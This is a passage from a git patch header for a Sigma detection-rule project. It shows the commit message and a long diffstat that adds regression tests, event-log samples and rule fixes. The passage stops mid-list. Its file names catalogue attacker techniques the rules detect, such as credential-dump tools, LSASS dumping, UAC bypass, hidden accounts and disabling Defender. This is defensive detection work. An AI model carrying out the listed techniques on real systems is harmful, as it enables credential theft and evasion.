From 2cb7375c6b1d8035bf773ef29d065793b645eb37 Mon Sep 17 00:00:00 2001 From: Nasreddine Bencherchali Date: Tue, 25 Nov 2025 16:00:53 +0100 Subject: [PATCH] Merge PR #5719 from @nasbench - Add regression test CI, data and simulation links update: Cred Dump Tools Dropped Files - Add procdump.exe and procdump64a.exe update: File Download From Browser Process Via Inline URL - Enhance selection by splitting CLI markers for better matching update: Tor Client/Browser Execution - Add additional PE metadata markers update: System Information Discovery via Registry Queries - Enhance registry markers update: PUA - AdFind Suspicious Execution - Add -sc to dclist string for more accurate coverage. fix: Removal Of Index Value to Hide Schedule Task - Registry - Remove EventType condition that broke the rule. fix: Removal Of SD Value to Hide Schedule Task - Registry - Remove EventType condition that broke the rule. fix: Creation of a Local Hidden User Account by Registry - Fix the TargetObject value fix: Potential Persistence Via New AMSI Providers - Registry - Change logsource and fix the rule logic fix: Potential COM Object Hijacking Via TreatAs Subkey - Registry - Change logsource and fix the rule logic fix: Potential Persistence Via Logon Scripts - Registry - Fix incorrect logsource fix: PUA - Sysinternal Tool Execution - Registry - Fix incorrect logsource fix: Suspicious Execution Of Renamed Sysinternals Tools - Registry - Fix incorrect logsource fix: PUA - Sysinternals Tools Execution - Registry - Fix incorrect logsource chore: add CI script for regression chore: add regression data --------- Co-authored-by: swachchhanda000 <87493836+swachchhanda000@users.noreply.github.com> Co-authored-by: phantinuss <79651203+phantinuss@users.noreply.github.com> --- .github/workflows/known-FPs.csv | 2 + .github/workflows/regression-tests.yml | 31 + .../fed85bf9-e075-4280-9159-fbe8a023d6fa.evtx | Bin 0 -> 69632 bytes .../fed85bf9-e075-4280-9159-fbe8a023d6fa.json | 51 ++ .../info.yml | 13 + .../0b9ad457-2554-44c1-82c2-d56a99c42377.evtx | Bin 0 -> 69632 bytes .../0b9ad457-2554-44c1-82c2-d56a99c42377.json | 255 ++++++++ .../file_event_win_anydesk_artefact/info.yml | 13 + .../65236ec7-ace0-4f0c-82fd-737b04fd4dcb.evtx | Bin 0 -> 69632 bytes .../65236ec7-ace0-4f0c-82fd-737b04fd4dcb.json | 51 ++ .../info.yml | 13 + .../df6ecb8b-7822-4f4b-b412-08f524b4576c.evtx | Bin 0 -> 69632 bytes .../df6ecb8b-7822-4f4b-b412-08f524b4576c.json | 51 ++ .../info.yml | 13 + .../ee63c85c-6d51-4d12-ad09-04e25877a947.evtx | Bin 0 -> 69632 bytes .../ee63c85c-6d51-4d12-ad09-04e25877a947.json | 51 ++ .../info.yml | 13 + .../13c02350-4177-4e45-ac17-cf7ca628ff5e.evtx | Bin 0 -> 69632 bytes .../13c02350-4177-4e45-ac17-cf7ca628ff5e.json | 51 ++ .../info.yml | 13 + .../d5866ddf-ce8f-4aea-b28e-d96485a20d3d.evtx | Bin 0 -> 69632 bytes .../d5866ddf-ce8f-4aea-b28e-d96485a20d3d.json | 51 ++ .../info.yml | 13 + .../8fbf3271-1ef6-4e94-8210-03c2317947f6.evtx | Bin 0 -> 69632 bytes .../8fbf3271-1ef6-4e94-8210-03c2317947f6.json | 306 ++++++++++ .../info.yml | 13 + .../aba15bdd-657f-422a-bab3-ac2d2a0d6f1c.evtx | Bin 0 -> 69632 bytes .../aba15bdd-657f-422a-bab3-ac2d2a0d6f1c.json | 51 ++ .../info.yml | 13 + .../3215aa19-f060-4332-86d5-5602511f3ca8.evtx | Bin 0 -> 69632 bytes .../3215aa19-f060-4332-86d5-5602511f3ca8.json | 51 ++ .../info.yml | 13 + .../b447f7de-1e53-4cbf-bfb4-f1f6d0b04e4e.evtx | Bin 0 -> 69632 bytes .../b447f7de-1e53-4cbf-bfb4-f1f6d0b04e4e.json | 51 ++ .../info.yml | 13 + .../cd8b36ac-8e4a-4c2f-a402-a29b8fbd5bca.evtx | Bin 0 -> 69632 bytes .../cd8b36ac-8e4a-4c2f-a402-a29b8fbd5bca.json | 51 ++ .../info.yml | 13 + .../69ca12af-119d-44ed-b50f-a47af0ebc364.evtx | Bin 0 -> 69632 bytes .../69ca12af-119d-44ed-b50f-a47af0ebc364.json | 51 ++ .../info.yml | 13 + .../0e8cfe08-02c9-4815-a2f8-0d157b7ed33e.evtx | Bin 0 -> 69632 bytes .../0e8cfe08-02c9-4815-a2f8-0d157b7ed33e.json | 66 ++ .../info.yml | 12 + .../88d6e60c-759d-4ac1-a447-c0f1466c2d21.evtx | Bin 0 -> 69632 bytes .../88d6e60c-759d-4ac1-a447-c0f1466c2d21.json | 66 ++ .../info.yml | 12 + .../1c526788-0abe-4713-862f-b520da5e5316.evtx | Bin 0 -> 69632 bytes .../1c526788-0abe-4713-862f-b520da5e5316.json | 66 ++ .../info.yml | 12 + .../27ba3207-dd30-4812-abbf-5d20c57d474e.evtx | Bin 0 -> 69632 bytes .../27ba3207-dd30-4812-abbf-5d20c57d474e.json | 66 ++ .../info.yml | 12 + .../94771a71-ba41-4b6e-a757-b531372eaab6.evtx | Bin 0 -> 69632 bytes .../94771a71-ba41-4b6e-a757-b531372eaab6.json | 66 ++ .../info.yml | 12 + .../62f7c9bf-9135-49b2-8aeb-1e54a6ecc13c.evtx | Bin 0 -> 69632 bytes .../62f7c9bf-9135-49b2-8aeb-1e54a6ecc13c.json | 66 ++ .../info.yml | 12 + .../d2125259-ddea-4c1c-9c22-977eb5b29cf0.evtx | Bin 0 -> 69632 bytes .../d2125259-ddea-4c1c-9c22-977eb5b29cf0.json | 66 ++ .../info.yml | 13 + .../cc9cbe82-7bc0-4ef5-bc23-bbfb83947be7.evtx | Bin 0 -> 69632 bytes .../cc9cbe82-7bc0-4ef5-bc23-bbfb83947be7.json | 66 ++ .../info.yml | 13 + .../19b08b1c-861d-4e75-a1ef-ea0c1baf202b.evtx | Bin 0 -> 69632 bytes .../19b08b1c-861d-4e75-a1ef-ea0c1baf202b.json | 66 ++ .../info.yml | 13 + .../13e6fe51-d478-4c7e-b0f2-6da9b400a829.evtx | Bin 0 -> 69632 bytes .../13e6fe51-d478-4c7e-b0f2-6da9b400a829.json | 66 ++ .../info.yml | 13 + .../42a5f1e7-9603-4f6d-97ae-3f37d130d794.evtx | Bin 0 -> 69632 bytes .../42a5f1e7-9603-4f6d-97ae-3f37d130d794.json | 66 ++ .../info.yml | 13 + .../e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a.evtx | Bin 0 -> 69632 bytes .../e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a.json | 66 ++ .../info.yml | 13 + .../ea0cdc3e-2239-4f26-a947-4e8f8224e464.evtx | Bin 0 -> 69632 bytes .../ea0cdc3e-2239-4f26-a947-4e8f8224e464.json | 66 ++ .../info.yml | 13 + .../82a6714f-4899-4f16-9c1e-9a333544d4c3.evtx | Bin 0 -> 69632 bytes .../82a6714f-4899-4f16-9c1e-9a333544d4c3.json | 66 ++ .../info.yml | 13 + .../3ffd6f51-e6c1-47b7-94b4-c1e61d4117c5.evtx | Bin 0 -> 69632 bytes .../3ffd6f51-e6c1-47b7-94b4-c1e61d4117c5.json | 66 ++ .../info.yml | 13 + .../6c6d9280-e6d0-4b9d-80ac-254701b64916.evtx | Bin 0 -> 69632 bytes .../6c6d9280-e6d0-4b9d-80ac-254701b64916.json | 66 ++ .../info.yml | 13 + .../7090adee-82e2-4269-bd59-80691e7c6338.evtx | Bin 0 -> 69632 bytes .../7090adee-82e2-4269-bd59-80691e7c6338.json | 66 ++ .../info.yml | 13 + .../c7942406-33dd-4377-a564-0f62db0593a3.evtx | Bin 0 -> 69632 bytes .../c7942406-33dd-4377-a564-0f62db0593a3.json | 66 ++ .../info.yml | 13 + .../4b046706-5789-4673-b111-66f25fe99534.evtx | Bin 0 -> 69632 bytes .../4b046706-5789-4673-b111-66f25fe99534.json | 66 ++ .../info.yml | 13 + .../ddeff553-5233-4ae9-bbab-d64d2bd634be.evtx | Bin 0 -> 69632 bytes .../ddeff553-5233-4ae9-bbab-d64d2bd634be.json | 66 ++ .../proc_creation_win_clip_execution/info.yml | 13 + .../3d3aa6cd-6272-44d6-8afc-7e88dfef7061.evtx | Bin 0 -> 69632 bytes .../3d3aa6cd-6272-44d6-8afc-7e88dfef7061.json | 66 ++ .../info.yml | 13 + .../7c9340a9-e2ee-4e43-94c5-c54ebbea1006.evtx | Bin 0 -> 69632 bytes .../7c9340a9-e2ee-4e43-94c5-c54ebbea1006.json | 66 ++ .../info.yml | 13 + .../e9b61244-893f-427c-b287-3e708f321c6b.evtx | Bin 0 -> 69632 bytes .../e9b61244-893f-427c-b287-3e708f321c6b.json | 66 ++ .../info.yml | 13 + .../41ca393d-538c-408a-ac27-cf1e038be80c.evtx | Bin 0 -> 69632 bytes .../41ca393d-538c-408a-ac27-cf1e038be80c.json | 66 ++ .../info.yml | 13 + .../b1ec66c6-f4d1-4b5c-96dd-af28ccae7727.evtx | Bin 0 -> 69632 bytes .../b1ec66c6-f4d1-4b5c-96dd-af28ccae7727.json | 66 ++ .../info.yml | 13 + .../07f8bdc2-c9b3-472a-9817-5a670b872f53.evtx | Bin 0 -> 69632 bytes .../07f8bdc2-c9b3-472a-9817-5a670b872f53.json | 66 ++ .../proc_creation_win_cmdkey_recon/info.yml | 13 + .../056c7317-9a09-4bd4-9067-d051312752ea.evtx | Bin 0 -> 69632 bytes .../056c7317-9a09-4bd4-9067-d051312752ea.json | 66 ++ .../info.yml | 13 + .../e218595b-bbe7-4ee5-8a96-f32a24ad3468.evtx | Bin 0 -> 69632 bytes .../e218595b-bbe7-4ee5-8a96-f32a24ad3468.json | 66 ++ .../info.yml | 13 + .../b4dc61f5-6cce-468e-a608-b48b469feaa2.evtx | Bin 0 -> 69632 bytes .../b4dc61f5-6cce-468e-a608-b48b469feaa2.json | 66 ++ .../info.yml | 13 + .../0022869c-49f7-4ff2-ba03-85ac42ddac58.evtx | Bin 0 -> 69632 bytes .../0022869c-49f7-4ff2-ba03-85ac42ddac58.json | 66 ++ .../info.yml | 13 + .../43e32da2-fdd0-4156-90de-50dfd62636f9.evtx | Bin 0 -> 69632 bytes .../43e32da2-fdd0-4156-90de-50dfd62636f9.json | 66 ++ .../proc_creation_win_dism_remove/info.yml | 13 + .../9fc3072c-dc8f-4bf7-b231-18950000fadd.evtx | Bin 0 -> 69632 bytes .../9fc3072c-dc8f-4bf7-b231-18950000fadd.json | 66 ++ .../info.yml | 12 + .../a20def93-0709-4eae-9bd2-31206e21e6b2.evtx | Bin 0 -> 69632 bytes .../a20def93-0709-4eae-9bd2-31206e21e6b2.json | 66 ++ .../info.yml | 12 + .../3bad990e-4848-4a78-9530-b427d854aac0.evtx | Bin 0 -> 69632 bytes .../3bad990e-4848-4a78-9530-b427d854aac0.json | 66 ++ .../info.yml | 13 + .../7124aebe-4cd7-4ccb-8df0-6d6b93c96795.evtx | Bin 0 -> 69632 bytes .../7124aebe-4cd7-4ccb-8df0-6d6b93c96795.json | 132 ++++ .../info.yml | 12 + .../c3d76afc-93df-461e-8e67-9b2bad3f2ac4.evtx | Bin 0 -> 69632 bytes .../c3d76afc-93df-461e-8e67-9b2bad3f2ac4.json | 66 ++ .../info.yml | 12 + .../91a2c315-9ee6-4052-a853-6f6a8238f90d.evtx | Bin 0 -> 69632 bytes .../91a2c315-9ee6-4052-a853-6f6a8238f90d.json | 66 ++ .../info.yml | 13 + .../fe63010f-8823-4864-a96b-a7b4a0f7b929.evtx | Bin 0 -> 69632 bytes .../fe63010f-8823-4864-a96b-a7b4a0f7b929.json | 66 ++ .../proc_creation_win_findstr_lsass/info.yml | 13 + .../47e4bab7-c626-47dc-967b-255608c9a920.evtx | Bin 0 -> 69632 bytes .../47e4bab7-c626-47dc-967b-255608c9a920.json | 198 ++++++ .../info.yml | 13 + .../ccb5742c-c248-4982-8c5c-5571b9275ad3.evtx | Bin 0 -> 69632 bytes .../ccb5742c-c248-4982-8c5c-5571b9275ad3.json | 66 ++ .../info.yml | 13 + .../4fe074b4-b833-4081-8f24-7dcfeca72b42.evtx | Bin 0 -> 69632 bytes .../4fe074b4-b833-4081-8f24-7dcfeca72b42.json | 198 ++++++ .../info.yml | 13 + .../af491bca-e752-4b44-9c86-df5680533dbc.evtx | Bin 0 -> 69632 bytes .../af491bca-e752-4b44-9c86-df5680533dbc.json | 66 ++ .../info.yml | 13 + .../e56d3073-83ff-4021-90fe-c658e0709e72.evtx | Bin 0 -> 69632 bytes .../e56d3073-83ff-4021-90fe-c658e0709e72.json | 66 ++ .../info.yml | 12 + .../68c8acb4-1b60-4890-8e82-3ddf7a6dba84.evtx | Bin 0 -> 69632 bytes .../68c8acb4-1b60-4890-8e82-3ddf7a6dba84.json | 66 ++ .../info.yml | 12 + .../455b9d50-15a1-4b99-853f-8d37655a4c1b.evtx | Bin 0 -> 69632 bytes .../455b9d50-15a1-4b99-853f-8d37655a4c1b.json | 66 ++ .../info.yml | 13 + .../514e7e3e-b3b4-4a67-af60-be20f139198b.evtx | Bin 0 -> 69632 bytes .../514e7e3e-b3b4-4a67-af60-be20f139198b.json | 66 ++ .../info.yml | 13 + .../9a132afa-654e-11eb-ae93-0242ac130002.evtx | Bin 0 -> 69632 bytes .../9a132afa-654e-11eb-ae93-0242ac130002.json | 66 ++ .../info.yml | 13 + .../bef37fa2-f205-4a7b-b484-0759bfd5f86f.evtx | Bin 0 -> 69632 bytes .../bef37fa2-f205-4a7b-b484-0759bfd5f86f.json | 66 ++ .../info.yml | 13 + .../54773c5f-f1cc-4703-9126-2f797d96a69d.evtx | Bin 0 -> 69632 bytes .../54773c5f-f1cc-4703-9126-2f797d96a69d.json | 66 ++ .../info.yml | 13 + .../d2b749ee-4225-417e-b20e-a8d2193cbb84.evtx | Bin 0 -> 69632 bytes .../d2b749ee-4225-417e-b20e-a8d2193cbb84.json | 66 ++ .../info.yml | 13 + .../fa00b701-44c6-4679-994d-5a18afa8a707.evtx | Bin 0 -> 69632 bytes .../fa00b701-44c6-4679-994d-5a18afa8a707.json | 66 ++ .../info.yml | 13 + .../de587dce-915e-4218-aac4-835ca6af6f70.evtx | Bin 0 -> 69632 bytes .../de587dce-915e-4218-aac4-835ca6af6f70.json | 66 ++ .../info.yml | 13 + .../d7662ff6-9e97-4596-a61d-9839e32dee8d.evtx | Bin 0 -> 69632 bytes .../d7662ff6-9e97-4596-a61d-9839e32dee8d.json | 66 ++ .../info.yml | 13 + .../9ec9fb1b-e059-4489-9642-f270c207923d.evtx | Bin 0 -> 69632 bytes .../9ec9fb1b-e059-4489-9642-f270c207923d.json | 66 ++ .../info.yml | 13 + .../df55196f-f105-44d3-a675-e9dfb6cc2f2b.evtx | Bin 0 -> 69632 bytes .../df55196f-f105-44d3-a675-e9dfb6cc2f2b.json | 66 ++ .../proc_creation_win_renamed_adfind/info.yml | 13 + .../36480ae1-a1cb-4eaa-a0d6-29801d7e9142.evtx | Bin 0 -> 69632 bytes .../36480ae1-a1cb-4eaa-a0d6-29801d7e9142.json | 66 ++ .../proc_creation_win_renamed_binary/info.yml | 13 + .../0ba1da6d-b6ce-4366-828c-18826c9de23e.evtx | Bin 0 -> 69632 bytes .../0ba1da6d-b6ce-4366-828c-18826c9de23e.json | 66 ++ .../info.yml | 13 + .../7530cd3d-7671-43e3-b209-976966f6ea48.evtx | Bin 0 -> 69632 bytes .../7530cd3d-7671-43e3-b209-976966f6ea48.json | 66 ++ .../proc_creation_win_renamed_curl/info.yml | 13 + .../277a4393-446c-449a-b0ed-7fdc7795244c.evtx | Bin 0 -> 69632 bytes .../277a4393-446c-449a-b0ed-7fdc7795244c.json | 66 ++ .../proc_creation_win_renamed_ftp/info.yml | 13 + .../bd1c6866-65fc-44b2-be51-5588fcff82b9.evtx | Bin 0 -> 69632 bytes .../bd1c6866-65fc-44b2-be51-5588fcff82b9.json | 66 ++ .../proc_creation_win_renamed_msdt/info.yml | 13 + .../81bcb81b-5b1f-474b-b373-52c871aaa7b1.evtx | Bin 0 -> 69632 bytes .../81bcb81b-5b1f-474b-b373-52c871aaa7b1.json | 66 ++ ...bcb81b-5b1f-474b-b373-52c871aaa7b1.jsoncls | 66 ++ .../info.yml | 13 + .../41d1058a-aea7-4952-9293-29eaaf516465.evtx | Bin 0 -> 69632 bytes .../41d1058a-aea7-4952-9293-29eaaf516465.json | 51 ++ .../info.yml | 13 + .../3a9b8c1e-5b2e-4f7a-9d1c-2a7f3b6e1c55.evtx | Bin 0 -> 69632 bytes .../3a9b8c1e-5b2e-4f7a-9d1c-2a7f3b6e1c55.json | 51 ++ .../registry_delete_runmru/info.yml | 13 + .../526cc8bc-1cdc-48ad-8b26-f19bff969cec.evtx | Bin 0 -> 69632 bytes .../526cc8bc-1cdc-48ad-8b26-f19bff969cec.json | 51 ++ .../info.yml | 13 + .../acd74772-5f88-45c7-956b-6a7b36c294d2.evtx | Bin 0 -> 69632 bytes .../acd74772-5f88-45c7-956b-6a7b36c294d2.json | 51 ++ .../info.yml | 13 + .../460479f3-80b7-42da-9c43-2cc1d54dbccd.evtx | Bin 0 -> 69632 bytes .../460479f3-80b7-42da-9c43-2cc1d54dbccd.json | 51 ++ .../info.yml | 13 + .../1547e27c-3974-43e2-a7d7-7f484fb928ec.evtx | Bin 0 -> 69632 bytes .../1547e27c-3974-43e2-a7d7-7f484fb928ec.json | 52 ++ .../info.yml | 13 + .../944e8941-f6f6-4ee8-ac05-1c224e923c0e.evtx | Bin 0 -> 69632 bytes .../944e8941-f6f6-4ee8-ac05-1c224e923c0e.json | 52 ++ .../registry_set_add_port_monitor/info.yml | 13 + .../37b437cf-3fc5-4c8e-9c94-1d7c9aff842b.evtx | Bin 0 -> 69632 bytes .../37b437cf-3fc5-4c8e-9c94-1d7c9aff842b.json | 52 ++ .../info.yml | 13 + .../46dd5308-4572-4d12-aa43-8938f0184d4f.evtx | Bin 0 -> 69632 bytes .../46dd5308-4572-4d12-aa43-8938f0184d4f.json | 52 ++ .../info.yml | 13 + .../674202d0-b22a-4af4-ae5f-2eda1f3da1af.evtx | Bin 0 -> 69632 bytes .../674202d0-b22a-4af4-ae5f-2eda1f3da1af.json | 52 ++ .../info.yml | 13 + .../724ea201-6514-4f38-9739-e5973c34f49a.evtx | Bin 0 -> 69632 bytes .../724ea201-6514-4f38-9739-e5973c34f49a.json | 52 ++ .../info.yml | 13 + .../509e84b9-a71a-40e0-834f-05470369bd1e.evtx | Bin 0 -> 69632 bytes .../509e84b9-a71a-40e0-834f-05470369bd1e.json | 52 ++ .../registry_set_change_rdp_port/info.yml | 13 + .../45e112d0-7759-4c2a-aa36-9f8fb79d3393.evtx | Bin 0 -> 69632 bytes .../45e112d0-7759-4c2a-aa36-9f8fb79d3393.json | 156 +++++ .../info.yml | 13 + .../8b7273a4-ba5d-4d8a-b04f-11f2900d043a.evtx | Bin 0 -> 69632 bytes .../8b7273a4-ba5d-4d8a-b04f-11f2900d043a.json | 52 ++ .../info.yml | 13 + .../c7dcacd0-cc59-4004-b0a4-1d6cdebe6f3e.evtx | Bin 0 -> 69632 bytes .../c7dcacd0-cc59-4004-b0a4-1d6cdebe6f3e.json | 104 ++++ .../info.yml | 13 + .../974515da-6cc5-4c95-ae65-f97f9150ec7f.evtx | Bin 0 -> 69632 bytes .../974515da-6cc5-4c95-ae65-f97f9150ec7f.json | 52 ++ .../info.yml | 13 + .../3ae1a046-f7db-439d-b7ce-b8b366b81fa6.evtx | Bin 0 -> 69632 bytes .../3ae1a046-f7db-439d-b7ce-b8b366b81fa6.json | 52 ++ .../info.yml | 13 + .../33efc23c-6ea2-4503-8cfe-bdf82ce8f705.evtx | Bin 0 -> 69632 bytes .../33efc23c-6ea2-4503-8cfe-bdf82ce8f705.json | 52 ++ .../info.yml | 13 + .../9b0f8a61-91b2-464f-aceb-0527e0a45020.evtx | Bin 0 -> 69632 bytes .../9b0f8a61-91b2-464f-aceb-0527e0a45020.json | 52 ++ .../info.yml | 13 + .../9ace0707-b560-49b8-b6ca-5148b42f39fb.evtx | Bin 0 -> 69632 bytes .../9ace0707-b560-49b8-b6ca-5148b42f39fb.json | 52 ++ .../info.yml | 13 + .../fecfd1a1-cc78-4313-a1ea-2ee2e8ec27a7.evtx | Bin 0 -> 69632 bytes .../fecfd1a1-cc78-4313-a1ea-2ee2e8ec27a7.json | 52 ++ .../info.yml | 13 + .../25ffa65d-76d8-4da5-a832-3f2b0136e133.evtx | Bin 0 -> 69632 bytes .../25ffa65d-76d8-4da5-a832-3f2b0136e133.json | 52 ++ .../info.yml | 13 + .../f50f3c09-557d-492d-81db-9064a8d4e211.evtx | Bin 0 -> 69632 bytes .../f50f3c09-557d-492d-81db-9064a8d4e211.json | 52 ++ .../info.yml | 13 + .../c7da8edc-49ae-45a2-9e61-9fd860e4e73d.evtx | Bin 0 -> 69632 bytes .../c7da8edc-49ae-45a2-9e61-9fd860e4e73d.json | 52 ++ .../info.yml | 13 + .../f8aebc67-a56d-4ec9-9fbe-7b0e8b7b4efd.evtx | Bin 0 -> 69632 bytes .../f8aebc67-a56d-4ec9-9fbe-7b0e8b7b4efd.json | 52 ++ .../registry_set_special_accounts/info.yml | 13 + .../8ac03a65-6c84-4116-acad-dc1558ff7a77.evtx | Bin 0 -> 69632 bytes .../8ac03a65-6c84-4116-acad-dc1558ff7a77.json | 46 ++ .../sysmon_config_modification/info.yml | 13 + .../auditd/lnx_auditd_binary_padding.yml | 5 + .../lnx_auditd_change_file_time_attr.yml | 13 + .../lnx_auditd_chattr_immutable_removal.yml | 5 + .../file_event_win_advanced_ip_scanner.yml | 1 + .../file_event_win_anydesk_artefact.yml | 1 + ...t_win_create_evtx_non_common_locations.yml | 1 + ...ile_event_win_create_non_existent_dlls.yml | 1 + ...e_event_win_creation_new_shim_database.yml | 1 + ...le_event_win_creation_system_dll_files.yml | 1 + .../file_event_win_creation_system_file.yml | 1 + ...vent_win_cred_dump_tools_dropped_files.yml | 5 +- ...file_event_win_dump_file_susp_creation.yml | 1 + ...le_event_win_susp_lnk_double_extension.yml | 1 + ...event_win_susp_public_folder_extension.yml | 1 + ...e_event_win_susp_recycle_bin_fake_exec.yml | 1 + .../file_event_win_taskmgr_lsass_dump.yml | 1 + ..._creation_win_at_interactive_execution.yml | 5 + ..._creation_win_bcdedit_boot_conf_tamper.yml | 5 + ...owsers_chromium_headless_file_download.yml | 1 + ...n_win_browsers_chromium_load_extension.yml | 1 + ...on_win_browsers_chromium_mockbin_abuse.yml | 1 + ..._browsers_chromium_susp_load_extension.yml | 1 + ...tion_win_browsers_inline_file_download.yml | 38 +- ...oc_creation_win_browsers_tor_execution.yml | 11 +- ..._win_certutil_certificate_installation.yml | 1 + .../proc_creation_win_certutil_decode.yml | 1 + .../proc_creation_win_certutil_download.yml | 1 + ...eation_win_certutil_download_direct_ip.yml | 1 + ...certutil_download_file_sharing_domains.yml | 1 + .../proc_creation_win_certutil_encode.yml | 1 + ...on_win_certutil_encode_susp_extensions.yml | 1 + ...tion_win_certutil_encode_susp_location.yml | 1 + .../proc_creation_win_certutil_export_pfx.yml | 1 + ...oc_creation_win_certutil_ntlm_coercion.yml | 1 + ...proc_creation_win_chcp_codepage_lookup.yml | 1 + ...proc_creation_win_chcp_codepage_switch.yml | 1 + ...tion_win_cipher_overwrite_deleted_data.yml | 6 + .../proc_creation_win_clip_execution.yml | 6 + .../proc_creation_win_cmd_assoc_execution.yml | 1 + .../proc_creation_win_cmd_dir_execution.yml | 6 + .../proc_creation_win_cmd_mklink_osk_cmd.yml | 1 + .../proc_creation_win_cmd_rmdir_execution.yml | 1 + ...eation_win_cmdkey_adding_generic_creds.yml | 6 + .../proc_creation_win_cmdkey_recon.yml | 6 + ...eation_win_conhost_headless_powershell.yml | 1 + .../proc_creation_win_curl_susp_download.yml | 6 + .../proc_creation_win_dirlister_execution.yml | 8 +- ...creation_win_discovery_via_reg_queries.yml | 21 +- .../proc_creation_win_dism_remove.yml | 6 + .../proc_creation_win_driverquery_recon.yml | 1 + .../proc_creation_win_driverquery_usage.yml | 1 + ...ion_win_dsquery_domain_trust_discovery.yml | 6 + .../proc_creation_win_dtrace_kernel_dump.yml | 1 + ...lorer_folder_shortcut_via_shell_binary.yml | 1 + ...roc_creation_win_findstr_gpp_passwords.yml | 6 + .../proc_creation_win_findstr_lsass.yml | 1 + ...oc_creation_win_findstr_recon_everyone.yml | 1 + ...creation_win_findstr_recon_pipe_output.yml | 1 + ...on_win_findstr_security_keyword_lookup.yml | 6 + .../proc_creation_win_finger_execution.yml | 1 + .../proc_creation_win_gpresult_execution.yml | 6 + .../proc_creation_win_hh_chm_execution.yml | 1 + ...oc_creation_win_pua_adfind_enumeration.yml | 1 + ...proc_creation_win_pua_adfind_execution.yml | 1 + ...roc_creation_win_pua_adfind_susp_usage.yml | 14 +- ...c_creation_win_pua_advanced_ip_scanner.yml | 1 + ...creation_win_pua_advanced_port_scanner.yml | 1 + .../proc_creation_win_pua_advancedrun.yml | 1 + ...creation_win_pua_advancedrun_priv_user.yml | 1 + .../proc_creation_win_reg_add_run_key.yml | 1 + .../proc_creation_win_reg_add_safeboot.yml | 1 + ...in_registry_special_accounts_hide_user.yml | 1 + .../proc_creation_win_renamed_adfind.yml | 1 + .../proc_creation_win_renamed_binary.yml | 1 + ...ion_win_renamed_binary_highly_relevant.yml | 1 + .../proc_creation_win_renamed_curl.yml | 1 + .../proc_creation_win_renamed_ftp.yml | 1 + .../proc_creation_win_renamed_msdt.yml | 1 + .../proc_creation_win_sc_stop_service.yml | 1 + ...egistry_add_persistence_amsi_providers.yml | 30 - ...persistence_disk_cleanup_handler_entry.yml | 4 +- ...istry_delete_removal_amsi_registry_key.yml | 6 + .../registry_delete_runmru.yml | 1 + ...asks_hide_task_via_index_value_removal.yml | 4 +- ...chtasks_hide_task_via_sd_value_removal.yml | 4 +- .../registry_event_add_local_hidden_user.yml | 10 +- ...stry_set_add_load_service_in_safe_mode.yml | 10 + .../registry_set_add_port_monitor.yml | 6 + ...et_allow_rdp_remote_assistance_feature.yml | 6 + ...y_set_bypass_uac_using_delegateexecute.yml | 6 + ...istry_set_bypass_uac_using_eventviewer.yml | 6 + ...et_bypass_uac_using_silentcleanup_task.yml | 6 + .../registry_set_change_rdp_port.yml | 12 +- .../registry_set_change_security_zones.yml | 6 + ...pervisorenforcedcodeintegrity_disabled.yml | 8 +- ...istry_set_disable_administrative_share.yml | 6 + ...registry_set_disable_defender_firewall.yml | 6 + ..._disable_security_center_notifications.yml | 6 + ...egistry_set_persistence_amsi_providers.yml | 41 ++ ...istry_set_persistence_com_key_linking.yml} | 15 +- ..._logon_scripts_userinitmprlogonscript.yml} | 11 +- ...gistry_set_powershell_logging_disabled.yml | 8 + ...t_pua_sysinternals_execution_via_eula.yml} | 6 +- ...sinternals_renamed_execution_via_eula.yml} | 6 +- ..._sysinternals_susp_execution_via_eula.yml} | 6 +- .../registry_set_special_accounts.yml | 8 +- .../sysmon/sysmon_config_modification.yml | 1 + tests/regression_tests_runner.py | 566 ++++++++++++++++++ tests/thor.yml | 11 +- 412 files changed, 9353 insertions(+), 84 deletions(-) create mode 100644 .github/workflows/regression-tests.yml create mode 100644 regression_data/windows/file/file_event/file_event_win_advanced_ip_scanner/fed85bf9-e075-4280-9159-fbe8a023d6fa.evtx create mode 100644 regression_data/windows/file/file_event/file_event_win_advanced_ip_scanner/fed85bf9-e075-4280-9159-fbe8a023d6fa.json create mode 100644 regression_data/windows/file/file_event/file_event_win_advanced_ip_scanner/info.yml create mode 100644 regression_data/windows/file/file_event/file_event_win_anydesk_artefact/0b9ad457-2554-44c1-82c2-d56a99c42377.evtx create mode 100644 regression_data/windows/file/file_event/file_event_win_anydesk_artefact/0b9ad457-2554-44c1-82c2-d56a99c42377.json create mode 100644 regression_data/windows/file/file_event/file_event_win_anydesk_artefact/info.yml create mode 100644 regression_data/windows/file/file_event/file_event_win_create_evtx_non_common_locations/65236ec7-ace0-4f0c-82fd-737b04fd4dcb.evtx create mode 100644 regression_data/windows/file/file_event/file_event_win_create_evtx_non_common_locations/65236ec7-ace0-4f0c-82fd-737b04fd4dcb.json create mode 100644 regression_data/windows/file/file_event/file_event_win_create_evtx_non_common_locations/info.yml create mode 100644 regression_data/windows/file/file_event/file_event_win_create_non_existent_dlls/df6ecb8b-7822-4f4b-b412-08f524b4576c.evtx create mode 100644 regression_data/windows/file/file_event/file_event_win_create_non_existent_dlls/df6ecb8b-7822-4f4b-b412-08f524b4576c.json create mode 100644 regression_data/windows/file/file_event/file_event_win_create_non_existent_dlls/info.yml create mode 100644 regression_data/windows/file/file_event/file_event_win_creation_new_shim_database/ee63c85c-6d51-4d12-ad09-04e25877a947.evtx create mode 100644 regression_data/windows/file/file_event/file_event_win_creation_new_shim_database/ee63c85c-6d51-4d12-ad09-04e25877a947.json create mode 100644 regression_data/windows/file/file_event/file_event_win_creation_new_shim_database/info.yml create mode 100644 regression_data/windows/file/file_event/file_event_win_creation_system_dll_files/13c02350-4177-4e45-ac17-cf7ca628ff5e.evtx create mode 100644 regression_data/windows/file/file_event/file_event_win_creation_system_dll_files/13c02350-4177-4e45-ac17-cf7ca628ff5e.json create mode 100644 regression_data/windows/file/file_event/file_event_win_creation_system_dll_files/info.yml create mode 100644 regression_data/windows/file/file_event/file_event_win_creation_system_file/d5866ddf-ce8f-4aea-b28e-d96485a20d3d.evtx create mode 100644 regression_data/windows/file/file_event/file_event_win_creation_system_file/d5866ddf-ce8f-4aea-b28e-d96485a20d3d.json create mode 100644 regression_data/windows/file/file_event/file_event_win_creation_system_file/info.yml create mode 100644 regression_data/windows/file/file_event/file_event_win_cred_dump_tools_dropped_files/8fbf3271-1ef6-4e94-8210-03c2317947f6.evtx create mode 100644 regression_data/windows/file/file_event/file_event_win_cred_dump_tools_dropped_files/8fbf3271-1ef6-4e94-8210-03c2317947f6.json create mode 100644 